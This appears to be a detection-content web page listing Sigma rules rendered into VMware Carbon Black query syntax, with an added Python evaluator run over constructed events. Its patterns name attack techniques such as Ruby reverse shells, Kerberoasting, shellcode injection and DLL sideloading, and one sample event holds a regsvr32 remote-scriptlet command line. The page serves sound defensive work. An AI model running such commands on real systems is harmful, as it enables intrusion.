Tool category: EDR / XDR

VMware Carbon Black

1,440 rules · Sigma detections in VMware Carbon Black syntax
The same Sigma detection corpus, machine-rendered into VMware Carbon Black query syntax and ready to paste. Switch platforms above for identical coverage in another language, or choose Sigma (generic) for the portable YAML.
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert. Check the rule's logsource as well: the Carbon Black sensor collects endpoint process, file, registry, module-load and network events, so rules rendered here from other sources (Kubernetes audit logs, the Windows Security log, the NTLM operational log) only return results if you forward that source into the same search index and the rendered field names actually exist there.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
Judge. Each rule shows a quality tier (Strong / Moderate / Basic) and an estimated alert-volume tier (Low / Medium / High FP), both scored deterministically from the rule's shape - status, detection depth, match breadth, log source, documented false positives and references. A rule existing is not the same as a rule being good, or being quiet; hover either tier for the breakdown. The FP estimate reads rule shape, not a measured rate, so use it to pick what to tune first before you deploy.
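Adapt and Validate together, as an added worked example (this is not SigmaHQ, pySigma or Carbon Black code, and the page's rendered queries are not derived from it): a small Python evaluator for Sigma detection blocks, run over constructed events. It implements only the modifiers and condition forms the rules listed below use, resolves dotted field names against nested JSON so the same code covers Kubernetes audit events, and exercises two of the rules on this page, "Potential Regsvr32 Commandline Flag Anomaly" (including its windash flag variants and its /n filter) and "Potential Remote Command Execution In Pod Container". The rule bodies are transcribed from the page's YAML; the events, paths and pod names are made up for the example.

```python
"""Tiny evaluator for the Sigma detection blocks on this page (added example).

Not SigmaHQ/pySigma code. Supports only what the listed rules use: the
contains / startswith / endswith / all / windash modifiers, list values (OR),
list-of-maps selections (OR of ANDs), dotted field names for nested JSON, and
the conditions 'selection', 'all of <prefix>*', '<expr> and not 1 of <prefix>*'.
"""
import re

WINDASH = ["-", "/", "\u2013", "\u2014", "\u2015"]  # variants Sigma's windash expands to


def get_field(event, name):
    """Resolve a plain or dotted field name such as 'objectRef.resource'."""
    cur = event
    for part in name.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur


def expand_values(values, mods):
    """Normalise one value or a list of values; apply windash expansion."""
    vals = [str(v) for v in (values if isinstance(values, list) else [values])]
    if "windash" in mods:
        # Simplification: every '-' in the value is swapped for each dash variant.
        vals = [v.replace("-", d) for v in vals for d in WINDASH]
    return vals


def match_item(event, key, values):
    """Evaluate one 'field|modifiers: value(s)' entry; Sigma matching is case-insensitive."""
    field, *mods = key.split("|")
    actual = get_field(event, field)
    if actual is None:
        return False
    actual = str(actual).lower()
    hits = []
    for v in expand_values(values, mods):
        v = v.lower()
        if "contains" in mods:
            hits.append(v in actual)
        elif "startswith" in mods:
            hits.append(actual.startswith(v))
        elif "endswith" in mods:
            hits.append(actual.endswith(v))
        else:
            hits.append(actual == v)
    return all(hits) if "all" in mods else any(hits)


def match_selection(event, sel):
    """A map is an AND of its entries; a list of maps is an OR of maps."""
    if isinstance(sel, list):
        return any(match_selection(event, s) for s in sel)
    return all(match_item(event, k, v) for k, v in sel.items())


def evaluate(detection, event):
    """Evaluate the 'condition' of a detection block against one event."""
    def group(expr):
        m = re.fullmatch(r"(all|1) of (\w+)\*", expr)
        if not m:
            return match_selection(event, detection[expr])
        names = [n for n in detection if n != "condition" and n.startswith(m.group(2))]
        hits = [match_selection(event, detection[n]) for n in names]
        return all(hits) if m.group(1) == "all" else any(hits)

    positive, *negatives = [p.strip() for p in detection["condition"].split(" and not ")]
    return group(positive) and not any(group(n) for n in negatives)


def fire(detection, events):
    """Indices of the events the detection block matches."""
    return [i for i, e in enumerate(events) if evaluate(detection, e)]


# Detection blocks transcribed from two rules on this page.
REGSVR32_FLAG_ANOMALY = {
    "selection": {"Image|endswith": "\\regsvr32.exe", "CommandLine|contains|windash": " -i:"},
    "filter_main_flag": {"CommandLine|contains|windash": " -n "},
    "condition": "selection and not 1 of filter_main_*",
}
POD_EXEC = {
    "selection": {"verb": "create", "objectRef.resource": "pods", "objectRef.subresource": "exec"},
    "condition": "selection",
}

# Constructed sample events (not real telemetry; hosts, paths and names are made up).
PROCESS_EVENTS = [
    {"Image": "C:\\Windows\\System32\\regsvr32.exe",  # /i without /n: fires
     "CommandLine": "regsvr32.exe /s /i:http://example.invalid/a.sct scrobj.dll"},
    {"Image": "C:\\Windows\\System32\\regsvr32.exe",  # /n present: filtered out
     "CommandLine": "regsvr32.exe /s /n /i:install payload.dll"},
    {"Image": "C:\\Windows\\System32\\regsvr32.exe",  # en dash flag, caught by windash: fires
     "CommandLine": "regsvr32.exe \u2013i:install payload.dll"},
    {"Image": "C:\\Windows\\System32\\cmd.exe",  # right flag, wrong image: no hit
     "CommandLine": "cmd.exe /c echo -i:"},
]
K8S_AUDIT_EVENTS = [
    {"verb": "create", "objectRef": {"resource": "pods", "subresource": "exec", "name": "web-0"}},
    {"verb": "get", "objectRef": {"resource": "pods", "subresource": "log", "name": "web-0"}},
]

if __name__ == "__main__":
    print("regsvr32 hits:", fire(REGSVR32_FLAG_ANOMALY, PROCESS_EVENTS))  # [0, 2]
    print("pod exec hits:", fire(POD_EXEC, K8S_AUDIT_EVENTS))  # [0]
```

The second process event shows the filter doing its job and the fourth shows why the Image clause matters. To check a field mapping before deploying a rendered query, swap the constructed events for a handful of real process_creation records exported from your own tenant, renamed into Sigma's taxonomy, and confirm the indices you expect come back.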

Detection rules

Level: medium · Quality: Strong · Alert volume: Medium FP
Potential Regsvr32 Commandline Flag Anomaly
Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.
status: test · author: Florian Roth (Nextron Systems) · ATT&CK mapping: sub-technique · id: b236190c-1c61-41e9-84b3-3fe03f6d76b0
carbon_black query
(Image:\\regsvr32.exe (CommandLine:\ \-i\:* OR CommandLine:\ \/i\:* OR CommandLine:\ –i\:* OR CommandLine:\ —i\:* OR CommandLine:\ ―i\:*)) (-(CommandLine:\ \-n\ * OR CommandLine:\ \/n\ * OR CommandLine:\ –n\ * OR CommandLine:\ —n\ * OR CommandLine:\ ―n\ *))
Sigma YAML
title: Potential Regsvr32 Commandline Flag Anomaly
id: b236190c-1c61-41e9-84b3-3fe03f6d76b0
status: test
description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.
references:
    - https://twitter.com/sbousseaden/status/1282441816986484737?s=12
author: Florian Roth (Nextron Systems)
date: 2019-07-13
modified: 2024-03-13
tags:
    - attack.stealth
    - attack.t1218.010
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\regsvr32.exe'
        CommandLine|contains|windash: ' -i:'
    filter_main_flag:
        CommandLine|contains|windash: ' -n '
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Administrator typo might cause some false positives
level: medium
Level: medium · Quality: Moderate · Alert volume: Low FP
Potential Remote Command Execution In Pod Container
Detects attempts to execute remote commands, within a Pod's container using e.g. the "kubectl exec" command.
status: test · author: Leo Tsaousis (@laripping) · ATT&CK mapping: technique · id: a1b0ca4e-7835-413e-8471-3ff2b8a66be6
carbon_black query
verb:create "objectRef.resource":pods "objectRef.subresource":exec
Sigma YAML
title: Potential Remote Command Execution In Pod Container
id: a1b0ca4e-7835-413e-8471-3ff2b8a66be6
status: test
description: |
    Detects attempts to execute remote commands, within a Pod's container using e.g. the "kubectl exec" command.
references:
    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Exec%20into%20container/
author: Leo Tsaousis (@laripping)
date: 2024-03-26
tags:
    - attack.t1609
    - attack.execution
logsource:
    category: application
    product: kubernetes
    service: audit
detection:
    selection:
        verb: 'create'
        objectRef.resource: 'pods'
        objectRef.subresource: 'exec'
    condition: selection
falsepositives:
    - Legitimate debugging activity. Investigate the identity performing the requests and their authorization.
level: medium
Level: medium · Quality: Moderate · Alert volume: Medium FP
Potential Remote Desktop Connection to Non-Domain Host
Detects logons using NTLM to hosts that are potentially not part of the domain.
status: test · author: James Pemberton · ATT&CK mapping: sub-technique · id: ce5678bb-b9aa-4fb5-be4b-e57f686256ad
carbon_black query
EventID:8001 TargetName:TERMSRV*
Sigma YAML
title: Potential Remote Desktop Connection to Non-Domain Host
id: ce5678bb-b9aa-4fb5-be4b-e57f686256ad
status: test
description: Detects logons using NTLM to hosts that are potentially not part of the domain.
references:
    - n/a
author: James Pemberton
date: 2020-05-22
modified: 2021-11-27
tags:
    - attack.command-and-control
    - attack.t1219.002
logsource:
    product: windows
    service: ntlm
    definition: Requires events from Microsoft-Windows-NTLM/Operational
detection:
    selection:
        EventID: 8001
        TargetName|startswith: 'TERMSRV'
    condition: selection
falsepositives:
    - Host connections to valid domains, exclude these.
    - Host connections not using host FQDN.
    - Host connections to external legitimate domains.
level: medium
Level: medium · Quality: Moderate · Alert volume: High FP
Potential Remote Desktop Tunneling
Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.
status: test · author: Tim Rauch, Elastic (idea) · ATT&CK mapping: technique · id: 8a3038e8-9c9d-46f8-b184-66234a160f6f
carbon_black query
CommandLine:\:3389* (CommandLine:\ \-L\ * OR CommandLine:\ \-P\ * OR CommandLine:\ \-R\ * OR CommandLine:\ \-pw\ * OR CommandLine:\ \-ssh\ *)
Sigma YAML
title: Potential Remote Desktop Tunneling
id: 8a3038e8-9c9d-46f8-b184-66234a160f6f
status: test
description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.
references:
    - https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html
author: Tim Rauch, Elastic (idea)
date: 2022-09-27
tags:
    - attack.lateral-movement
    - attack.t1021
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains: ':3389' # RDP port and usual SSH tunneling related switches in command line
    selection_opt:
        CommandLine|contains:
            - ' -L '
            - ' -P '
            - ' -R '
            - ' -pw '
            - ' -ssh '
    condition: all of selection*
falsepositives:
    - Unknown
level: medium
Level: medium · Quality: Strong · Alert volume: Low FP
Potential Remote WMI ActiveScriptEventConsumers Activity
Detects potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network. This event is best correlated and used as an enrichment to determine the potential lateral movement activity.
status: test · author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) · ATT&CK mapping: sub-technique · id: 9599c180-e3a8-4743-8f92-7fb96d3be648
carbon_black query
(EventID:4624 LogonType:3 ProcessName:scrcons.exe) (-TargetLogonId:0x3e7)
Sigma YAML
title: Potential Remote WMI ActiveScriptEventConsumers Activity
id: 9599c180-e3a8-4743-8f92-7fb96d3be648
status: test
description: |
    Detects potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network.
    This event is best correlated and used as an enrichment to determine the potential lateral movement activity.
references:
    - https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-09-02
modified: 2024-09-02
tags:
    - attack.lateral-movement
    - attack.privilege-escalation
    - detection.threat-hunting
    - attack.persistence
    - attack.t1546.003
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4624
        LogonType: 3
        ProcessName|endswith: 'scrcons.exe'
    filter_main_local_system:
        TargetLogonId: '0x3e7' # Local System
    condition: selection and not 1 of filter_main_*
falsepositives:
    - SCCM
level: medium
Level: medium · Quality: Moderate · Alert volume: Medium FP
Potential RjvPlatform.DLL Sideloading From Default Location
Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
status: test · author: X__Junior (Nextron Systems) · ATT&CK mapping: sub-technique · id: 259dda31-b7a3-444f-b7d8-17f96e8a7d0d
carbon_black query
Image:C\:\\Windows\\System32\\SystemResetPlatform\\SystemResetPlatform.exe ImageLoaded:C\:\\$SysReset\\Framework\\Stack\\RjvPlatform.dll
Sigma YAML
title: Potential RjvPlatform.DLL Sideloading From Default Location
id: 259dda31-b7a3-444f-b7d8-17f96e8a7d0d
status: test
description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
references:
    - https://twitter.com/0gtweet/status/1666716511988330499
author: X__Junior (Nextron Systems)
date: 2023-06-09
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        Image: 'C:\Windows\System32\SystemResetPlatform\SystemResetPlatform.exe'
        ImageLoaded: 'C:\$SysReset\Framework\Stack\RjvPlatform.dll'
    condition: selection
falsepositives:
    - Unknown
level: medium
Level: medium · Quality: Strong · Alert volume: Medium FP
Potential RoboForm.DLL Sideloading
Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
status: test · author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: sub-technique · id: f64c9b2d-b0ad-481d-9d03-7fc75020892a
carbon_black query
(ImageLoaded:\\roboform.dll OR ImageLoaded:\\roboform\-x64.dll) (-((Image:C\:\\Program\ Files\ \(x86\)\\Siber\ Systems\\AI\ RoboForm\\* OR Image:C\:\\Program\ Files\\Siber\ Systems\\AI\ RoboForm\\*) (Image:\\robotaskbaricon.exe OR Image:\\robotaskbaricon\-x64.exe)))
Sigma YAML
title: Potential RoboForm.DLL Sideloading
id: f64c9b2d-b0ad-481d-9d03-7fc75020892a
status: test
description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
references:
    - https://twitter.com/StopMalvertisin/status/1648604148848549888
    - https://twitter.com/t3ft3lb/status/1656194831830401024
    - https://www.roboform.com/
author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-14
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith:
            - '\roboform.dll'
            - '\roboform-x64.dll'
    filter_main_path:
        Image|startswith:
            - 'C:\Program Files (x86)\Siber Systems\AI RoboForm\'
            - 'C:\Program Files\Siber Systems\AI RoboForm\'
        Image|endswith:
            - '\robotaskbaricon.exe'
            - '\robotaskbaricon-x64.exe'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - If installed on a per-user level, the path would be located in "AppData\Local". Add additional filters to reflect this mode of installation
level: medium
Level: medium · Quality: Moderate · Alert volume: High FP
Potential Ruby Reverse Shell
Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to set up a reverse shell
status: test · author: @d4ns4n_ · ATT&CK mapping: tactic only · id: b8bdac18-c06e-4016-ac30-221553e74f59
carbon_black query
Image:ruby* (CommandLine:\ \-e* CommandLine:rsocket* CommandLine:TCPSocket*) (CommandLine:\ ash* OR CommandLine:\ bash* OR CommandLine:\ bsh* OR CommandLine:\ csh* OR CommandLine:\ ksh* OR CommandLine:\ pdksh* OR CommandLine:\ sh* OR CommandLine:\ tcsh*)
Sigma YAML
title: Potential Ruby Reverse Shell
id: b8bdac18-c06e-4016-ac30-221553e74f59
status: test
description: Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to set up a reverse shell
references:
    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
    - https://www.revshells.com/
author: '@d4ns4n_'
date: 2023-04-07
tags:
    - attack.execution
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|contains: 'ruby'
        CommandLine|contains|all:
            - ' -e'
            - 'rsocket'
            - 'TCPSocket'
        CommandLine|contains:
            - ' ash'
            - ' bash'
            - ' bsh'
            - ' csh'
            - ' ksh'
            - ' pdksh'
            - ' sh'
            - ' tcsh'
    condition: selection
falsepositives:
    - Unknown
level: medium
Level: medium · Quality: Moderate · Alert volume: High FP
Potential SAP NetWeaver Webshell Creation
Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories, which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.
status: experimental · author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems) · ATT&CK mapping: sub-technique · id: 86a7c91f-98c3-4f14-a58d-d989421e1234
carbon_black query
(TargetFilename:\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\work* OR TargetFilename:\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\root*) (TargetFilename:.jsp OR TargetFilename:.java OR TargetFilename:.class)
Sigma YAML
title: Potential SAP NetWeaver Webshell Creation
id: 86a7c91f-98c3-4f14-a58d-d989421e1234
status: experimental
description: |
    Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories,
    which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.
references:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31324
    - https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/
    - https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/
author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-04-28
tags:
    - attack.execution
    - attack.initial-access
    - attack.t1190
    - attack.persistence
    - attack.t1059.003
    - cve.2025-31324
    - detection.emerging-threats
logsource:
    product: windows
    category: file_event
detection:
    selection_path:
        TargetFilename|contains:
            - '\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work'
            - '\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root'
    selection_ext:
        TargetFilename|endswith:
            - '.jsp'
            - '.java'
            - '.class'
    condition: all of selection_*
falsepositives:
    - Legitimate creation of jsp, java or class files in these locations
level: medium
Level: medium · Quality: Moderate · Alert volume: High FP
Potential SAP NetWeaver Webshell Creation - Linux
Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories, which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.
status: experimental · author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems) · ATT&CK mapping: sub-technique · id: 5b91409c-cb18-4ab6-ac75-c5759f998409
carbon_black query
(TargetFilename:\/j2ee\/cluster\/apps\/sap.com\/irj\/servlet_jsp\/irj\/work\/* OR TargetFilename:\/j2ee\/cluster\/apps\/sap.com\/irj\/servlet_jsp\/irj\/root\/*) (TargetFilename:.jsp OR TargetFilename:.java OR TargetFilename:.class)
Sigma YAML
title: Potential SAP NetWeaver Webshell Creation - Linux
id: 5b91409c-cb18-4ab6-ac75-c5759f998409
status: experimental
description: |
    Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories,
    which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.
references:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31324
    - https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/
    - https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/
author: Elastic (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-04-28
tags:
    - attack.execution
    - attack.initial-access
    - attack.t1190
    - attack.persistence
    - attack.t1059.003
    - cve.2025-31324
    - detection.emerging-threats
logsource:
    product: linux
    category: file_event
detection:
    selection_path:
        TargetFilename|contains:
            - '/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work/'
            - '/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/'
    selection_ext:
        TargetFilename|endswith:
            - '.jsp'
            - '.java'
            - '.class'
    condition: all of selection_*
falsepositives:
    - Legitimate creation of jsp, java or class files in these locations
level: medium
Level: medium · Quality: Strong · Alert volume: High FP
Potential SPN Enumeration Via Setspn.EXE
Detects service principal name (SPN) enumeration used for Kerberoasting
status: test · author: Markus Neis, keepwatch · ATT&CK mapping: sub-technique · id: 1eeed653-dbc8-4187-ad0c-eeebb20e6599
carbon_black query
(Image:\\setspn.exe OR OriginalFileName:setspn.exe OR (Description:Query\ or\ reset\ the\ computer* Description:SPN\ attribute*)) (CommandLine:\ \-q\ * OR CommandLine:\ \/q\ *)
Sigma YAML
title: Potential SPN Enumeration Via Setspn.EXE
id: 1eeed653-dbc8-4187-ad0c-eeebb20e6599
status: test
description: Detects service principal name (SPN) enumeration used for Kerberoasting
references:
    - https://web.archive.org/web/20200329173843/https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation
    - https://www.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation/?edition=2019
author: Markus Neis, keepwatch
date: 2018-11-14
modified: 2023-10-23
tags:
    - attack.credential-access
    - attack.t1558.003
logsource:
    category: process_creation
    product: windows
detection:
    selection_pe:
        - Image|endswith: '\setspn.exe'
        - OriginalFileName: 'setspn.exe'
        - Description|contains|all:
              - 'Query or reset the computer'
              - 'SPN attribute'
    selection_cli:
        CommandLine|contains:
            - ' -q '
            - ' /q '
    condition: all of selection_*
falsepositives:
    - Administration activity
level: medium
Level: medium · Quality: Moderate · Alert volume: Medium FP
Potential Script Proxy Execution Via CL_Mutexverifiers.ps1
Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands
status: test · author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113 · ATT&CK mapping: technique · id: 1e0e1a81-e79b-44bc-935b-ddb9c8006b3d
carbon_black query
((ParentImage:\\powershell.exe OR ParentImage:\\pwsh.exe) Image:\\powershell.exe CommandLine:\ \-nologo\ \-windowstyle\ minimized\ \-file\ *) (CommandLine:\\AppData\\Local\\Temp\\* OR CommandLine:\\Windows\\Temp\\*)
Sigma YAML
title: Potential Script Proxy Execution Via CL_Mutexverifiers.ps1
id: 1e0e1a81-e79b-44bc-935b-ddb9c8006b3d
status: test
description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands
references:
    - https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/
author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113
date: 2022-05-21
modified: 2023-08-17
tags:
    - attack.stealth
    - attack.t1216
logsource:
    category: process_creation
    product: windows
detection:
    selection_pwsh:
        ParentImage|endswith:
            # Note: to avoid potential FPs we assume the script was launched from powershell. But in theory it can be launched by any Powershell like process
            - '\powershell.exe'
            - '\pwsh.exe'
        Image|endswith: '\powershell.exe'
        CommandLine|contains: ' -nologo -windowstyle minimized -file '
    selection_temp:
        # Note: Since the function uses "env:temp" the value will change depending on the context of exec
        CommandLine|contains:
            - '\AppData\Local\Temp\'
            - '\Windows\Temp\'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
Level: medium · Quality: Strong · Alert volume: Medium FP
Potential Secure Deletion with SDelete
Detects files that have extensions commonly seen while SDelete is used to wipe files.
status: test · author: Thomas Patzke · ATT&CK mapping: sub-technique · id: 39a80702-d7ca-4a83-b776-525b1f86a36d
carbon_black query
(EventID:4656 OR EventID:4663 OR EventID:4658) (ObjectName:.AAA OR ObjectName:.ZZZ)
Sigma YAML
title: Potential Secure Deletion with SDelete
id: 39a80702-d7ca-4a83-b776-525b1f86a36d
status: test
description: Detects files that have extensions commonly seen while SDelete is used to wipe files.
references:
    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm
    - https://www.jpcert.or.jp/english/pub/sr/ir_research.html
    - https://learn.microsoft.com/en-gb/sysinternals/downloads/sdelete
author: Thomas Patzke
date: 2017-06-14
modified: 2024-12-13
tags:
    - attack.impact
    - attack.stealth
    - attack.defense-impairment
    - attack.t1070.004
    - attack.t1027.005
    - attack.t1485
    - attack.t1553.002
    - attack.s0195
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID:
            - 4656
            - 4663
            - 4658
        ObjectName|endswith:
            - '.AAA'
            - '.ZZZ'
    condition: selection
falsepositives:
    - Legitimate usage of SDelete
    - Files that are interacted with that have these extensions legitimately
level: medium
Level: medium · Quality: Moderate · Alert volume: Medium FP
Potential SentinelOne Shell Context Menu Scan Command Tampering
Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: tactic only · id: 6c304b02-06e6-402d-8be4-d5833cdf8198
carbon_black query
TargetObject:\\shell\\SentinelOneScan\\command\\* (-(((Details:C\:\\Program\ Files\\SentinelOne\\Sentinel\ Agent* OR Details:C\:\\Program\ Files\ \(x86\)\\SentinelOne\\Sentinel\ Agent*) Details:\\SentinelScanFromContextMenu.exe*) OR (Image:C\:\\Program\ Files\\SentinelOne\\* OR Image:C\:\\Program\ Files\ \(x86\)\\SentinelOne\\*)))
Sigma YAML
title: Potential SentinelOne Shell Context Menu Scan Command Tampering
id: 6c304b02-06e6-402d-8be4-d5833cdf8198
status: test
description: Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.
references:
    - https://mrd0x.com/sentinelone-persistence-via-menu-context/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2024-03-06
tags:
    - attack.persistence
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\shell\SentinelOneScan\command\'
    filter_main_sentinelone_default_scan_binary:
        Details|startswith:
            - 'C:\Program Files\SentinelOne\Sentinel Agent'
            - 'C:\Program Files (x86)\SentinelOne\Sentinel Agent'
        Details|contains: '\SentinelScanFromContextMenu.exe'
    filter_main_sentinelone_binary:
        Image|startswith:
            - 'C:\Program Files\SentinelOne\'
            - 'C:\Program Files (x86)\SentinelOne\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium
Level: medium · Quality: Moderate · Alert volume: High FP
Potential ShellDispatch.DLL Functionality Abuse
Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"
status: test · author: X__Junior (Nextron Systems) · ATT&CK mapping: tactic only · id: 82343930-652f-43f5-ab70-2ee9fdd6d5e9
carbon_black query
(Image:\\rundll32.exe OR OriginalFileName:RUNDLL32.EXE) CommandLine:RunDll_ShellExecuteW*
Sigma YAML
title: Potential ShellDispatch.DLL Functionality Abuse
id: 82343930-652f-43f5-ab70-2ee9fdd6d5e9
status: test
description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"
references:
    - https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/
author: X__Junior (Nextron Systems)
date: 2023-06-20
tags:
    - attack.execution
    - attack.stealth
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\rundll32.exe'
        - OriginalFileName: 'RUNDLL32.EXE'
    selection_cli:
        CommandLine|contains: 'RunDll_ShellExecuteW'
    condition: all of selection_*
falsepositives:
    - Unlikely
level: medium
Level: medium · Quality: Moderate · Alert volume: High FP
Potential ShellDispatch.DLL Sideloading
Detects potential DLL sideloading of "ShellDispatch.dll"
status: test · author: X__Junior (Nextron Systems) · ATT&CK mapping: sub-technique · id: 844f8eb2-610b-42c8-89a4-47596e089663
carbon_black query
ImageLoaded:\\ShellDispatch.dll (-((ImageLoaded:\:\\Users\\* ImageLoaded:\\AppData\\Local\\Temp\\*) OR ImageLoaded:\:\\Windows\\Temp\\*))
Sigma YAML
title: Potential ShellDispatch.DLL Sideloading
id: 844f8eb2-610b-42c8-89a4-47596e089663
status: test
description: Detects potential DLL sideloading of "ShellDispatch.dll"
references:
    - https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/
author: X__Junior (Nextron Systems)
date: 2023-06-20
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith: '\ShellDispatch.dll'
    filter_main_legit_path:
        - ImageLoaded|contains|all:
              - ':\Users\'
              - '\AppData\Local\Temp\'
        - ImageLoaded|contains: ':\Windows\Temp\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Some installers may trigger some false positives
level: medium
Level: medium · Quality: Strong · Alert volume: Medium FP
Potential Shellcode Injection
Detects potential shellcode injection as seen used by tools such as Metasploit's migrate and Empire's psinject.
status: test · author: Bhabesh Raj · ATT&CK mapping: technique · id: 250ae82f-736e-4844-a68b-0b5e8cc887da
carbon_black query
((GrantedAccess:0x147a OR GrantedAccess:0x1f3fff) CallTrace:UNKNOWN*) (-(SourceImage:C\:\\Windows\\System32\\Wbem\\Wmiprvse.exe TargetImage:C\:\\Windows\\system32\\lsass.exe)) (-(((SourceImage:C\:\\Program\ Files\\Dell\\* OR SourceImage:C\:\\Program\ Files\ \(x86\)\\Dell\\*) (TargetImage:C\:\\Program\ Files\\Dell\\* OR TargetImage:C\:\\Program\ Files\ \(x86\)\\Dell\\*)) OR (SourceImage:C\:\\Program\ Files\ \(x86\)\\Dell\\UpdateService\\ServiceShell.exe TargetImage:C\:\\Windows\\Explorer.EXE) OR (SourceImage:C\:\\Program\ Files\\Microsoft\ Visual\ Studio\\* TargetImage:C\:\\Program\ Files\\Microsoft\ Visual\ Studio\\*)))
Sigma YAML
title: Potential Shellcode Injection
id: 250ae82f-736e-4844-a68b-0b5e8cc887da
status: test
description: Detects potential shellcode injection as seen used by tools such as Metasploit's migrate and Empire's psinject.
references:
    - https://github.com/EmpireProject/PSInject
author: Bhabesh Raj
date: 2022-03-11
modified: 2024-07-02
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
